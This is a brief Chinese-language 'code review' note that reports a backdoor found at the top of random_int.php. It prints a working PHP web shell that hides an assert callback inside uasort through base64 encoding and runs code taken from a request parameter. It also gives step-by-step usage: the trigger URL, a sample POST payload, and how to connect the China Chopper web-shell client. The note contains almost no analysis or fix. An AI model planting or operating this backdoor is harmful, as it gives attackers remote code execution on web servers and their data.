代码审查
在random_int.php 前排 发现以下回调后门
<?php
error_reporting(0);
$e = $_REQUEST['e'];
$arr = array('test', $_REQUEST['POST']);
uasort($arr, base64_decode($e));
用法: http://www.xxx.com/6.php?e=YXNzZXJ0
浏览器提交POST:POST=phpinfo();
菜刀连接用法: http://www.xxx.com/6.php?e=YXNzZXJ0
YXNzZXJ0为assert加密值